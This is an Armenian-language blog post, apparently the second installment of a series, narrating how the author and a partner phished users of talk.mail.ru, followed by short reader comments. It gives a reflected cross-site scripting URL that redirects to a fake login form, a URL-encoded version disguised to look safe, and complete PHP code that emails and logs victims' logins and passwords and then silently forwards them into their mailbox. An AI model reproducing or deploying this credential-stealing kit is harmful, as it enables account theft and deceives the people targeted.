- – - նյութի սկիզբը կարող եք կարդալ այստեղ – - -
[օր երկրորդ...]
Հաջորդ օրը (ավելի ճիշտ հենց նույն օրը, քանի որ օրն արդեն փոխվել էր) ասկա-իս վրա նամակ եկավ pixcher-ից: Նա սարքել էր ֆիկտիվ ֆորման ու տեղադրել “թունավոր” հասցեում`
http://talk.mail.ru/login.html?target=”><script>location.href=’Վերահասցեավորում դեպի ֆիկտիվ ֆորմա’</script>
Բայց այս վիճակում հղումս ահավոր վախենալու և բացահայտ տեսք ուներ, ու մենք մի քիչ այն դիմակավորեցինք, որպեսզի յուզերները ոչ մի գալիք վտանգ չզգան: Արդյունքում ստացանք ահա սա`
http://talk.mail.ru/login.html?targe…72%69%70%74%3e
Հաջորդ քայլում արդեն գրեցինք մի փոքրիկ սնիֆֆեր, որը ստանում էր իրեն փոխանցված տվյալները, գրում ֆայլի մեջ, իսկ վերջում յուզերին “շպրտում” իր փոստարկղ: Ահա սնիֆֆերիս կոդը`
<?
$adminmail = “mymail@mail.ru”;
function email($to,$mailtext) {
mail($to,’password’,$mailtext,$adminmail);
}
$text=”[".date("d.m.y H:i")."]Login: $_POST[login] Password: $_POST[pass]\r\n”;
email($adminmail,$text);
$file = fopen(“logs.txt”,”a”);
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);
echo “<FORM id=’auth’ action=’http://talk.mail.ru/login.html’ method=post>
<INPUT value=’$_POST[login]‘>
<INPUT value=’$_POST[pass]‘>
<script>auth.submit();</script>
</FORM>”;
?>
Ուշադրություն դարձրեք, թե ինչպես է յուզերը մտնում իր փոստարկղ (տող 17)`
<script>auth.submit();</script>
Ֆիկտիվ էջի (այսուհետ` ֆեյկ) պատրաստման գործընթացն էդքան էլ դժվար չէ, ֆայլը պահում ենք մեր կոմպի վինչի մեջ, իսկ form տեգի action փոփոխականը ռեդիռեկտ ենք անում: Արդյունքում, յուզերի կողմից մուտքագրված տվյալները գրվում են իմ ֆայլի մեջ, իսկ ինքը կտեղափոխվի փոստարկղ, ու կմտածի, որ DNS-ի խնդիր էր տեղի ունեցել կայքում…
- – - Շարունակելի – - -
է հա իմաստը ?
*(ինձ ճիշտ հասկացի)
կԸխնդրեմ Գը, կարդալ բլոգի վերնագիրը` ՄԻ ՎԵԲ ԾՐԱԳՐԱՎՈՐՈՂԻ ԲԼՈԳ,
կարդացած ա